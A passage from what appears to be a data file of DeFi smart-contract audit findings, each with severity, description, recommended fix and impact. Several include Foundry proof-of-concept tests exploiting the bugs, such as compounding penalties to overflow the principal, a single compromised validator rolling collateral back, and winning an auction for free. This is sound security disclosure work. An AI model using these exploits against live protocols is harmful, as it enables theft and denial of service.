_mToken.balanceOf(_bob) - bobInitialBalance;\\n //@audit-info Alice and Bob have earned the same M in day 1\\n assertNotEq(aliceEarningDay1, 0);\\n assertEq(aliceEarningDay1, bobEarningDay1);\\n //@audit-info Alice was removed from earner list\\n _registrar.removeFromList(TTGRegistrarReader.EARNERS_LIST, _alice);\\n vm.warp(block.timestamp + 1 days);\\n uint aliceEarningDay2 = _mToken.balanceOf(_alice) - aliceInitialBalance - aliceEarningDay1;\\n uint bobEarningDay2 = _mToken.balanceOf(_bob) - bobInitialBalance - bobEarningDay1;\\n //@audit-info Alice still earned M in day 2 even she was removed from earner list, the amount of which is same as Bob's earning\\n assertNotEq(aliceEarningDay2, 0);\\n assertEq(aliceEarningDay2, bobEarningDay2);\\n\\n uint earnerRateBefore = _mToken.earnerRate();\\n //@audit-info Only Alice can stop herself 
from earning\\n vm.prank(_alice);\\n _mToken.stopEarning();\\n uint earnerRateAfter = _mToken.earnerRate();\\n //@audit-info The earning rate was almost doubled after Alice called `stopEarning`\\n assertApproxEqRel(earnerRateBefore*2, earnerRateAfter, 0.01e18);\\n vm.warp(block.timestamp + 1 days);\\n uint aliceEarningDay3 = _mToken.balanceOf(_alice) - aliceInitialBalance - aliceEarningDay1 - aliceEarningDay2;\\n uint bobEarningDay3 = _mToken.balanceOf(_bob) - bobInitialBalance - bobEarningDay1 - bobEarningDay2;\\n //@audit-info Alice earned nothing \\n assertEq(aliceEarningDay3, 0);\\n //@audit-info Bob's earnings on day 3 were almost twice as much as what he earned on day 2.\\n assertApproxEqRel(bobEarningDay2*2, bobEarningDay3, 0.01e18);\\n }\\n```\\nчIntroduce a method that allows anyone to stop the disapproved earner from earning:\\n```\\n function stopEarning(address account_) external {\\n if (_isApprovedEarner(account_)) revert IsApprovedEarner();\\n _stopEarning(account_);\\n }\\n```\\nчThe earnings of eligible users could potentially be diluted.\\nThe `excessOwedM` to ZERO vault holders could be dilutedч```\\n function rate() external view returns (uint256) {\\n uint256 safeEarnerRate_ = getSafeEarnerRate(\\n IMinterGateway(minterGateway).totalActiveOwedM(),\\n IMToken(mToken).totalEarningSupply(),\\n IMinterGateway(minterGateway).minterRate()\\n );\\n\\n return UIntMath.min256(maxRate(), (RATE_MULTIPLIER * safeEarnerRate_) / ONE);\\n }\\n\\n function getSafeEarnerRate(\\n uint240 totalActiveOwedM_,\\n uint240 totalEarningSupply_,\\n uint32 minterRate_\\n ) public pure returns (uint32) {\\n // solhint-disable max-line-length\\n // When `totalActiveOwedM_ >= totalEarningSupply_`, it is possible for the earner rate to be higher than the\\n // minter rate and still ensure cashflow safety over some period of time (`RATE_CONFIDENCE_INTERVAL`). 
To ensure\\n // cashflow safety, we start with `cashFlowOfActiveOwedM >= cashFlowOfEarningSupply` over some time `dt`.\\n // Effectively: p1 * (exp(rate1 * dt) - 1) >= p2 * (exp(rate2 * dt) - 1)\\n // So: rate2 <= ln(1 + (p1 * (exp(rate1 * dt) - 1)) / p2) / dt\\n // 1. totalActive * (delta_minterIndex - 1) >= totalEarning * (delta_earnerIndex - 1)\\n // 2. totalActive * (delta_minterIndex - 1) / totalEarning >= delta_earnerIndex - 1\\n // 3. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= delta_earnerIndex\\n // Substitute `delta_earnerIndex` with `exponent((earnerRate * dt) / SECONDS_PER_YEAR)`:\\n // 4. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= exponent((earnerRate * dt) / SECONDS_PER_YEAR)\\n // 5. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) >= (earnerRate * dt) / SECONDS_PER_YEAR\\n // 6. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) * SECONDS_PER_YEAR / dt >= earnerRate\\n\\n // When `totalActiveOwedM_ < totalEarningSupply_`, the instantaneous earner cash flow must be less than the\\n // instantaneous minter cash flow. To ensure instantaneous cashflow safety, we we use the derivatives of the\\n // previous starting inequality, and substitute `dt = 0`.\\n // Effectively: p1 * rate1 >= p2 * rate2\\n // So: rate2 <= p1 * rate1 / p2\\n // 1. totalActive * minterRate >= totalEarning * earnerRate\\n // 2. 
totalActive * minterRate / totalEarning >= earnerRate\\n // solhint-enable max-line-length\\n\\n if (totalActiveOwedM_ == 0) return 0;\\n\\n if (totalEarningSupply_ == 0) return type(uint32).max;\\n\\n if (totalActiveOwedM_ <= totalEarningSupply_) {//@audit-info rate is slashed\\n // NOTE: `totalActiveOwedM_ * minterRate_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n return uint32((uint256(totalActiveOwedM_) * minterRate_) / totalEarningSupply_);\\n }\\n\\n uint48 deltaMinterIndex_ = ContinuousIndexingMath.getContinuousIndex(\\n ContinuousIndexingMath.convertFromBasisPoints(minterRate_),\\n RATE_CONFIDENCE_INTERVAL\\n );//@audit-info deltaMinterIndex for 30 days\\n\\n // NOTE: `totalActiveOwedM_ * deltaMinterIndex_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n int256 lnArg_ = int256(\\n _EXP_SCALED_ONE +\\n ((uint256(totalActiveOwedM_) * (deltaMinterIndex_ - _EXP_SCALED_ONE)) / totalEarningSupply_)\\n );\\n\\n int256 lnResult_ = wadLn(lnArg_ * _WAD_TO_EXP_SCALER) / _WAD_TO_EXP_SCALER;\\n\\n uint256 expRate_ = (uint256(lnResult_) * ContinuousIndexingMath.SECONDS_PER_YEAR) / RATE_CONFIDENCE_INTERVAL;\\n\\n if (expRate_ > type(uint64).max) return type(uint32).max;\\n\\n // NOTE: Do not need to do `UIntMath.safe256` because it is known that `lnResult_` will not be negative.\\n uint40 safeRate_ = ContinuousIndexingMath.convertToBasisPoints(uint64(expRate_));\\n\\n return (safeRate_ > type(uint32).max) ? type(uint32).max : uint32(safeRate_);\\n }\\n```\\n -Malicious minters can repeatedly penalize their undercollateralized accounts in a short period of time, which can result in malfunctioning of critical protocol functions, such as `mintM`.чmediumчMalicious minters can exploit the `updateCollateral()` function to repeatedly penalize their undercollateralized accounts in a short period of time. 
This can cause the `principalOfTotalActiveOwedM` to reach `uint112.max` limit, disabling some critical functions, such as `mintM`.\\nThe `updateCollateral()` function allows minters to update their collateral status to the protocol, with penalties imposed in two scenarios:\\nA penalty is imposed for each missing collateral update interval.\\nA penalty is imposed if a minter is undercollateralized.\\nThe critical issue arises with the penalty for being undercollateralized, which is imposed on each call to `updateCollateral()`. This penalty is compounded, calculated as `penaltyRate * (principalOfActiveOwedM_ - principalOfMaxAllowedActiveOwedM_)`, and the `principalOfActiveOwedM_` increases with each imposed penalty.\\nProof Of Concept\\nWe can do a simple calculation, using the numbers from unit tests, mintRatio=90%, penaltyRate=1%, updateCollateralInterval=2000 (seconds). A malicious minter deposits `$100,000` t-bills as collateral, and mints `$90,000` M tokens. Since M tokens have 6 decimals, the collateral would be `100000e6`. Following the steps below, the malicious minter would be able to increase `principalOfActiveOwedM_` close to uint112.max limit:\\nDeposit collateral and mint M tokens.\\nWait for 4 collateral update intervals. This is for accumulating some initial penalty to get undercollateralized.\\nCall `updateCollateral()`. The penalty for missing updates would be `4 * 90000e6 * 1% = 36e8`.\\nStarting from `36e8`, we can keep calling `updateCollateral()` to compound penalty for undercollateralization. Each time would increase the penalty by 1%. We only need `log(2^112 / `36e8`, 1.01) ~ 5590` times to hit `uint112.max` limit.\\nAdd the following testing code to `MinterGateway.t.sol`. 
We can see in logs that `principalOfTotalActiveOwedM` has hit uint112.max limit.\\n```\\n penalty: 1 94536959275 94536000000\\n penalty: 2 95482328867 95481360000\\n penalty: 3 96437152156 96436173600\\n penalty: 4 97401523678 97400535336\\n penalty: 5 98375538914 98374540689\\n penalty: 6 99359294302 99358286095\\n penalty: 7 100352887244 100351868955\\n penalty: 8 101356416116 101355387644\\n penalty: 9 102369980277 102368941520\\n penalty: 10 103393680080 103392630935\\n // rest of code\\n penalty: 5990 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5991 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5992 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5993 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5994 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5995 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5996 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5997 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5998 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5999 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 6000 5192349545726433803396851311815959 5192296858534827628530496329220095\\n```\\n\\n```\\n // Using default test settings: mintRatio = 90%, penaltyRate = 1%, updateCollateralInterval = 2000.\\n function test_penaltyForUndercollateralization() external {\\n // 1. Minter1 deposits $100,000 t-bills, and mints 90,000 $M Tokens.\\n uint initialTimestamp = block.timestamp;\\n _minterGateway.setCollateralOf(_minter1, 100000e6);\\n _minterGateway.setUpdateTimestampOf(_minter1, initialTimestamp);\\n _minterGateway.setRawOwedMOf(_minter1, 90000e6);\\n _minterGateway.setPrincipalOfTotalActiveOwedM(90000e6);\\n\\n // 2. 
Minter does not update for 4 updateCollateralIntervals, causing penalty for missing updates.\\n vm.warp(initialTimestamp + 4 * _updateCollateralInterval);\\n\\n // 3. Minter fetches a lot of signatures from validator, each with different timestamp and calls `updateCollateral()` many times.\\n // Since the penalty for uncollateralization is counted every time, and would hit `uint112.max` at last.\\n uint256[] memory retrievalIds = new uint256[](0);\\n address[] memory validators = new address[](1);\\n validators[0] = _validator1;\\n\\n for (uint i = 1; i <= 6000; ++i) {\\n\\n uint256[] memory timestamps = new uint256[](1);\\n uint256 signatureTimestamp = initialTimestamp + i;\\n timestamps[0] = signatureTimestamp;\\n bytes[] memory signatures = new bytes[](1);\\n signatures[0] = _getCollateralUpdateSignature(\\n address(_minterGateway),\\n _minter1,\\n 100000e6,\\n retrievalIds,\\n bytes32(0),\\n signatureTimestamp,\\n _validator1Pk\\n );\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(100000e6, retrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n console.log(\"penalty:\", i, _minterGateway.totalActiveOwedM(), _minterGateway.principalOfTotalActiveOwedM());\\n }\\n }\\n```\\n\\nNote that in real use case, the penalty rate may lower (e.g. 0.1%), however, `log(2^112 / 36e8, 1.001) ~ 55656` is still a reasonable amount since there are 1440 minutes in 1 day (not to mention if the frequency for signature may be higher than once per minute). A malicious minter can still gather enough signatures for the attack.чConsider only imposing penalty for undercollateralization for each update interval.чThe direct impact is that `principalOfTotalActiveOwedM` will hit `uint112.max` limit. 
All related protocol features would be disfunctioned, the most important one being `mintM`, since the function would revert if `principalOfTotalActiveOwedM` hits `uint112.max` limit.\\n```\\n unchecked {\\n uint256 newPrincipalOfTotalActiveOwedM_ = uint256(principalOfTotalActiveOwedM_) + principalAmount_;\\n\\n // As an edge case precaution, prevent a mint that, if all owed M (active and inactive) was converted to\\n // a principal active amount, would overflow the `uint112 principalOfTotalActiveOwedM`.\\n> if (\\n> // NOTE: Round the principal up for worst case.\\n> newPrincipalOfTotalActiveOwedM_ + _getPrincipalAmountRoundedUp(totalInactiveOwedM) >= type(uint112).max\\n> ) {\\n> revert OverflowsPrincipalOfTotalOwedM();\\n> }\\n\\n principalOfTotalActiveOwedM = uint112(newPrincipalOfTotalActiveOwedM_);\\n _rawOwedM[msg.sender] += principalAmount_; // Treat rawOwedM as principal since minter is active.\\n }\\n```\\nч```\\n penalty: 1 94536959275 94536000000\\n penalty: 2 95482328867 95481360000\\n penalty: 3 96437152156 96436173600\\n penalty: 4 97401523678 97400535336\\n penalty: 5 98375538914 98374540689\\n penalty: 6 99359294302 99358286095\\n penalty: 7 100352887244 100351868955\\n penalty: 8 101356416116 101355387644\\n penalty: 9 102369980277 102368941520\\n penalty: 10 103393680080 103392630935\\n // rest of code\\n penalty: 5990 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5991 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5992 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5993 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5994 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5995 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5996 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5997 
5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5998 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5999 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 6000 5192349545726433803396851311815959 5192296858534827628530496329220095\\n```\\n -Validator threshold can be bypassed: a single compromised validator can update minter's state to historical stateчmediumчThe `updateCollateralValidatorThreshold` specifies the minimum number of validators needed to confirm the validity of `updateCollateral` data. However, just one compromised validator is enough to alter a minter's collateral status. In particular, this vulnerability allows the compromised validator to set the minter's state back to a historical state, allowing malicious minters to increase their collateral.\\nThe `updateCollateral()` function calls the `_verifyValidatorSignatures()` function, which calculates the minimum timestamp signed by all validators. This timestamp is then used to update the minter state's `_minterStates[minter_].updateTimestamp`. 
The constraint during this process is that the `_minterStates[minter_].updateTimestamp` must always be increasing.\\nFunction updateCollateral():\\n```\\n minTimestamp_ = _verifyValidatorSignatures(\\n msg.sender,\\n collateral_,\\n retrievalIds_,\\n metadataHash_,\\n validators_,\\n timestamps_,\\n signatures_\\n );\\n // rest of code\\n _updateCollateral(msg.sender, safeCollateral_, minTimestamp_);\\n // rest of code\\n```\\n\\nFunction _updateCollateral():\\n```\\n function _updateCollateral(address minter_, uint240 amount_, uint40 newTimestamp_) internal {\\n uint40 lastUpdateTimestamp_ = _minterStates[minter_].updateTimestamp;\\n\\n // MinterGateway already has more recent collateral update\\n if (newTimestamp_ <= lastUpdateTimestamp_) revert StaleCollateralUpdate(newTimestamp_, lastUpdateTimestamp_);\\n\\n _minterStates[minter_].collateral = amount_;\\n _minterStates[minter_].updateTimestamp = newTimestamp_;\\n }\\n```\\n\\nIf we have 1 compromised validator, its signature can be manipulated to any chosen timestamp. Consequently, this allows for control over the timestamp in `_minterStates[minter_].updateTimestamp` making it possible to update the minter's state to a historical state. An example is given in the following proof of concept. The key here is that even though `updateCollateralValidatorThreshold` may be set to 2 or even 3, as long as 1 validator is compromised, the attack vector would work, thus defeating the purpose of having a validator threshold.\\nProof Of Concept\\nIn this unit test, `updateCollateralInterval` is set to 2000 (default value). The `updateCollateralValidatorThreshold` is set to 2, and the `_validator1` is compromised. Following the steps below, we show how we update minter to a historical state:\\nInitial timestamp is `T0`.\\n100 seconds passed, the current timestamp is `T0+100`. Deposit 100e6 collateral at `T0+100`. `_validator0` signs signature at `T0+100`, and `_validator1` signs signature at `T0+1`. 
After `updateCollateral()`, minter state collateral = 100e6, and updateTimestamp = `T0+1`.\\nAnother 100 seconds passed, the current timestamp is `T0+200`. Propose retrieval for all collateral, and perform the retrieval offchain. `_validator0` signs signature at `T0+200`, and `_validator1` signs signature at `T0+2`. After `updateCollateral()`, minter state collateral = 0, and updateTimestamp = `T0+2`.\\nAnother 100 seconds passed, the current timestamp is `T0+300`. Reuse `_validator0` signature from step 1, it is signed on timestamp `T0+100`. `_validator1` signs collateral=100e6 at `T0+3`. After `updateCollateral()`, minter state collateral = 100e6, and updateTimestamp = `T0+3`.\\nNow, the minter is free to perform minting actions since his state claims collateral is 100e6, even though he has already retrieved it back in step 2. The mint proposal may even be proposed between step 1 and step 2 to reduce the mintDelay the minter has to wait.\\nAdd the following testing code to `MinterGateway.t.sol`. See more description in code comments.\\n```\\n function test_collateralStatusTimeTravelBySingleHackedValidator() external {\\n _ttgRegistrar.updateConfig(TTGRegistrarReader.UPDATE_COLLATERAL_VALIDATOR_THRESHOLD, bytes32(uint256(2)));\\n\\n // Arrange validator addresses in increasing order.\\n address[] memory validators = new address[](2);\\n validators[0] = _validator2;\\n validators[1] = _validator1;\\n\\n uint initialTimestamp = block.timestamp;\\n bytes[] memory cacheSignatures = new bytes[](2);\\n // 1. 
Deposit 100e6 collateral, and set malicious validator timestamp to `initialTimestamp+1` during `updateCollateral()`.\\n {\\n vm.warp(block.timestamp + 100);\\n\\n uint256[] memory retrievalIds = new uint256[](0);\\n uint256[] memory timestamps = new uint256[](2);\\n timestamps[0] = block.timestamp;\\n timestamps[1] = initialTimestamp + 1;\\n\\n bytes[] memory signatures = new bytes[](2);\\n signatures[0] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 100e6, retrievalIds, bytes32(0), block.timestamp, _validator2Pk);\\n signatures[1] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 100e6, retrievalIds, bytes32(0), initialTimestamp + 1, _validator1Pk);\\n cacheSignatures = signatures;\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(100e6, retrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n assertEq(_minterGateway.collateralOf(_minter1), 100e6);\\n assertEq(_minterGateway.collateralUpdateTimestampOf(_minter1), initialTimestamp + 1);\\n }\\n\\n // 2. 
Retrieve all collateral, and set malicious validator timestamp to `initialTimestamp+2` during `updateCollateral()`.\\n {\\n vm.prank(_minter1);\\n uint256 retrievalId = _minterGateway.proposeRetrieval(100e6);\\n\\n vm.warp(block.timestamp + 100);\\n\\n uint256[] memory newRetrievalIds = new uint256[](1);\\n newRetrievalIds[0] = retrievalId;\\n\\n uint256[] memory timestamps = new uint256[](2);\\n timestamps[0] = block.timestamp;\\n timestamps[1] = initialTimestamp + 2;\\n\\n bytes[] memory signatures = new bytes[](2);\\n signatures[0] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 0, newRetrievalIds, bytes32(0), block.timestamp, _validator2Pk);\\n signatures[1] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 0, newRetrievalIds, bytes32(0), initialTimestamp + 2, _validator1Pk);\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(0, newRetrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n assertEq(_minterGateway.collateralOf(_minter1), 0);\\n assertEq(_minterGateway.collateralUpdateTimestampOf(_minter1), initialTimestamp + 2);\\n }\\n\\n // 3. 
Reuse signature from step 1, and set malicious validator timestamp to `initialTimestamp+3` during `updateCollateral()`.\\n // We have successfully \"travelled back in time\", and minter1's collateral is back to 100e6.\\n {\\n vm.warp(block.timestamp + 100);\\n\\n uint256[] memory retrievalIds = new uint256[](0);\\n uint256[] memory timestamps = new uint256[](2);\\n timestamps[0] = block.timestamp - 200;\\n timestamps[1] = initialTimestamp + 3;\\n\\n bytes[] memory signatures = new bytes[](2);\\n signatures[0] = cacheSignatures[0];\\n signatures[1] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 100e6, retrievalIds, bytes32(0), initialTimestamp + 3, _validator1Pk);\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(100e6, retrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n assertEq(_minterGateway.collateralOf(_minter1), 100e6);\\n assertEq(_minterGateway.collateralUpdateTimestampOf(_minter1), initialTimestamp + 3);\\n }\\n }\\n```\\nчUse the maximum timestamp of all validators instead of minimum, or take the threshold-last minimum instead of the most minimum.чAs shown in the proof of concept, the minter can use the extra collateral to mint M tokens for free.\\nOne may claim that during minting, the `collateralOf()` function checks for `block.timestamp < collateralExpiryTimestampOf(minter_)`, however, since during deployment `updateCollateralInterval` is set to 86400, that gives us enough time to perform the attack vector before \"fake\" collateral expires.ч```\\n minTimestamp_ = _verifyValidatorSignatures(\\n msg.sender,\\n collateral_,\\n retrievalIds_,\\n metadataHash_,\\n validators_,\\n timestamps_,\\n signatures_\\n );\\n // rest of code\\n _updateCollateral(msg.sender, safeCollateral_, minTimestamp_);\\n // rest of code\\n```\\n -Liquidation bonus scales exponentially instead of linearly.чmediumчLiquidation bonus scales exponentially instead of linearly.\\nLet's look at the code of `getLiquidationBonus`\\n```\\n 
function getLiquidationBonus(\\n address token,\\n uint256 borrowedAmount,\\n uint256 times\\n ) public view returns (uint256 liquidationBonus) {\\n // Retrieve liquidation bonus for the given token\\n Liquidation memory liq = liquidationBonusForToken[token];\\n unchecked {\\n if (liq.bonusBP == 0) {\\n // If there is no specific bonus for the token\\n // Use default bonus\\n liq.minBonusAmount = Constants.MINIMUM_AMOUNT;\\n liq.bonusBP = dafaultLiquidationBonusBP;\\n }\\n liquidationBonus = (borrowedAmount * liq.bonusBP) / Constants.BP;\\n\\n if (liquidationBonus < liq.minBonusAmount) {\\n liquidationBonus = liq.minBonusAmount;\\n }\\n liquidationBonus *= (times > 0 ? times : 1);\\n }\\n }\\n```\\n\\nAs we can see, the liquidation bonus is based on the entire `borrowAmount` and multiplied by the number of new loans added. The problem is that it is unfair when the user makes a borrow against multiple lenders.\\nIf a user takes a borrow for X against 1 lender, they'll have to pay a liquidation bonus of Y. 
However, if they take a borrow for 3X against 3 lenders, they'll have to pay 9Y, meaning that taking a borrow against N lenders leads to overpaying liquidation bonus by N times.\\nFurthermore, if the user simply does it in multiple transactions, they can avoid these extra fees (as they can simply call `borrow` for X 3 times and pay 3Y in Liquidation bonuses)чmake liquidation bonus simply a % of totalBorrowedчLoss of fundsч```\\n function getLiquidationBonus(\\n address token,\\n uint256 borrowedAmount,\\n uint256 times\\n ) public view returns (uint256 liquidationBonus) {\\n // Retrieve liquidation bonus for the given token\\n Liquidation memory liq = liquidationBonusForToken[token];\\n unchecked {\\n if (liq.bonusBP == 0) {\\n // If there is no specific bonus for the token\\n // Use default bonus\\n liq.minBonusAmount = Constants.MINIMUM_AMOUNT;\\n liq.bonusBP = dafaultLiquidationBonusBP;\\n }\\n liquidationBonus = (borrowedAmount * liq.bonusBP) / Constants.BP;\\n\\n if (liquidationBonus < liq.minBonusAmount) {\\n liquidationBonus = liq.minBonusAmount;\\n }\\n liquidationBonus *= (times > 0 ? times : 1);\\n }\\n }\\n```\\n -When the amout of token acquired by a flash loan exceeds the expected value, the callback function will fail.чmediumчWhen the amout of token acquired by a flash loan exceeds the expected value, the callback function will fail.\\nThe function `wagmiLeverageFlashCallback` is used to handle the repayment operation after flash loan. After obtaining enough saleToken, it uses `_v3SwapExact` to convert the saleToken into holdToken. We know that the amount of holdTokens (holdTokenAmtIn) is proportional to the amount of saleTokens (amountToPay) obtained from flash loans. 
Later, the function will check the `holdTokenAmtIn` is no larger than decodedData.holdTokenDebt.\n```\n// Swap tokens to repay the flash loan\nuint256 holdTokenAmtIn = _v3SwapExact(\n v3SwapExactParams({\n isExactInput: false,\n fee: decodedData.fee,\n tokenIn: decodedData.holdToken,\n tokenOut: decodedData.saleToken,\n amount: amountToPay\n })\n);\ndecodedData.holdTokenDebt -= decodedData.zeroForSaleToken\n ? decodedData.amounts.amount1\n : decodedData.amounts.amount0;\n\n// Check for strict route adherence, revert the transaction if conditions are not met\n(decodedData.routes.strict && holdTokenAmtIn > decodedData.holdTokenDebt).revertError(\n ErrLib.ErrorCode.SWAP_AFTER_FLASH_LOAN_FAILED\n);\n```\n\nIn the function `_excuteCallback`, the amount of token finally obtained by the user through flash loan is `flashBalance`, which is the balance of the contract.\n```\n// Transfer the flashBalance to the recipient\ndecodedData.saleToken.safeTransfer(decodedDataExt.recipient, flashBalance);\n// Invoke the WagmiLeverage callback function with updated parameters\nIWagmiLeverageFlashCallback(decodedDataExt.recipient).wagmiLeverageFlashCallback(\n flashBalance,\n interest,\n decodedDataExt.originData\n);\n```\n\nNow let me describe how the attacker compromises the flash loans.\nFirst, the attacker makes a donation to the `FlashLoanAggregator` contract before the victim performs a flash loan (using front-run). Then the victim performs a flash loan, and he/she will get much more flashBalance than expected. 
Finally, in the function `wagmiLeverageFlashCallback`, the holdTokenAmtIn is larger than expected, which leads to failure.чIn the function `_excuteCallback`, the amount of token finally obtained by the user through flash loan should be the balance difference during the flash loan period.чDOSч```\n// Swap tokens to repay the flash loan\nuint256 holdTokenAmtIn = _v3SwapExact(\n v3SwapExactParams({\n isExactInput: false,\n fee: decodedData.fee,\n tokenIn: decodedData.holdToken,\n tokenOut: decodedData.saleToken,\n amount: amountToPay\n })\n);\ndecodedData.holdTokenDebt -= decodedData.zeroForSaleToken\n ? decodedData.amounts.amount1\n : decodedData.amounts.amount0;\n\n// Check for strict route adherence, revert the transaction if conditions are not met\n(decodedData.routes.strict && holdTokenAmtIn > decodedData.holdTokenDebt).revertError(\n ErrLib.ErrorCode.SWAP_AFTER_FLASH_LOAN_FAILED\n);\n```\n -Highest bidder can withdraw his collateral due to a missing check in _cancelAllBidsчhighчA bidder with the highest bid cannot cancel his bid since this would break the auction. 
A check to ensure this was implemented in `_cancelBid`.\\nHowever, this check was not implemented in `_cancelAllBids`, allowing the highest bidder to withdraw his collateral and win the auction for free.\\nThe highest bidder should not be able to cancel his bid, since this would break the entire auction mechanism.\\nIn `_cancelBid` we can find a require check that ensures this:\\n```\\n require(\\n bidder != l.highestBids[tokenId][round].bidder,\\n 'EnglishPeriodicAuction: Cannot cancel bid if highest bidder'\\n );\\n```\\n\\nYet in `_cancelAllBids`, this check was not implemented.\\n```\\n * @notice Cancel bids for all rounds\\n */\\n function _cancelAllBids(uint256 tokenId, address bidder) internal {\\n EnglishPeriodicAuctionStorage.Layout\\n storage l = EnglishPeriodicAuctionStorage.layout();\\n\\n uint256 currentAuctionRound = l.currentAuctionRound[tokenId];\\n\\n for (uint256 i = 0; i <= currentAuctionRound; i++) {\\n Bid storage bid = l.bids[tokenId][i][bidder];\\n\\n if (bid.collateralAmount > 0) {\\n // Make collateral available to withdraw\\n l.availableCollateral[bidder] += bid.collateralAmount;\\n\\n // Reset collateral and bid\\n bid.collateralAmount = 0;\\n bid.bidAmount = 0;\\n }\\n }\\n }\\n```\\n\\nExample: User Bob bids 10 eth and takes the highest bidder spot. Bob calls `cancelAllBidsAndWithdrawCollateral`.\\nThe `_cancelAllBids` function is called and this makes all the collateral from all his bids from every round available to Bob. This includes the current round `<=` and does not check if Bob is the current highest bidder. Nor is `l.highestBids[tokenId][round].bidder` reset, so the system still has Bob as the highest bidder.\\nThen `_withdrawCollateral` is automatically called and Bob receives his 10 eth back.\\nThe auction ends. 
If Bob is still the highest bidder, he wins the auction and his bidAmount of 10 eth is added to the availableCollateral of the oldBidder.\\nIf there currently is more than 10 eth in the contract (ongoing auctions, bids that have not withdrawn), then the oldBidder can withdraw 10 eth. But this means that in the future a withdraw will fail due to this missing 10 eth.чImplement the require check from _cancelBid to _cancelAllBids.чA malicious user can win an auction for free.\\nAdditionally, either the oldBidder or some other user in the future will suffer the loss.\\nIf this is repeated multiple times, it will drain the contract balance and all users will lose their locked collateral.ч```\\n require(\\n bidder != l.highestBids[tokenId][round].bidder,\\n 'EnglishPeriodicAuction: Cannot cancel bid if highest bidder'\\n );\\n```\\n -User Can Vote Even When They Have 0 Locked Mento (Edge Case)чmediumчThere exists an edge case where the user will be withdrawing his entire locked MENTO amount and even then will be able to vote , this is depicted by a PoC to make things clearer.\\nThe flow to receiving voting power can be understood in simple terms as follows ->\\nUsers locks his MENTO and chooses a delegate-> received veMENTO which gives them(delegatee) voting power (there's cliff and slope at play too)\\nThe veMENTO is not a standard ERC20 , it is depicted through \"lines\" , voting power declines ( ie. slope period) with time and with time you can withdraw more of your MENTO.\\nThe edge case where the user will be withdrawing his entire locked MENTO amount and even then will be able to vote is as follows ->\\n1.) User has locked his MENTO balance in the Locking.sol\\n2.) The owner of the contract \"stops\" the contract for some emergency reason.\\n4.) 
Since the contract is stopped , the `getAvailableForWithdraw` will return the entire locked amount of the user as withdrawable\\n```\\nfunction getAvailableForWithdraw(address account) public view returns (uint96) {\\n uint96 value = accounts[account].amount;\\n if (!stopped) {\\n uint32 currentBlock = getBlockNumber();\\n uint32 time = roundTimestamp(currentBlock);\\n uint96 bias = accounts[account].locked.actualValue(time, currentBlock);\\n value = value - (bias);\\n }\\n return value;\\n```\\n\\n5.) The user receives his entire locked amount in L101.\\n6.) The owner \"start()\" the contract again\\n7.) Since the user's veMENTO power was not effected by the above flow , there still exists veMENTO a.k.a voting power to the delegate, and the user's delegate is still able to vote on proposals (even when the user has withdrew everything).\\nPOC\\nImport console log first in the file , paste this test in the `GovernanceIntegration.t.sol`\\n```\\nfunction test_Poc_Stop() public {\\n\\n vm.prank(governanceTimelockAddress);\\n mentoToken.transfer(alice, 10_000e18);\\n\\n vm.prank(governanceTimelockAddress);\\n mentoToken.transfer(bob, 10_000e18);\\n\\n vm.prank(alice);\\n locking.lock(alice, alice, 10_000e18, 1, 103);\\n\\n vm.prank(bob);\\n locking.lock(bob, bob, 1500e18, 1, 103);\\n\\n vm.timeTravel(BLOCKS_DAY);\\n\\n uint256 newVotingDelay = BLOCKS_DAY;\\n uint256 newVotingPeriod = 2 * BLOCKS_WEEK;\\n uint256 newThreshold = 5000e18;\\n uint256 newQuorum = 10; //10%\\n uint256 newMinDelay = 3 days;\\n uint32 newMinCliff = 6;\\n uint32 newMinSlope = 12;\\n\\n vm.prank(alice);\\n (\\n uint256 proposalId,\\n address[] memory targets,\\n uint256[] memory values,\\n bytes[] memory calldatas,\\n string memory description\\n ) = Proposals._proposeChangeSettings(\\n mentoGovernor,\\n governanceTimelock,\\n locking,\\n newVotingDelay,\\n newVotingPeriod,\\n newThreshold,\\n newQuorum,\\n newMinDelay,\\n newMinCliff,\\n newMinSlope\\n );\\n\\n // ~10 mins\\n 
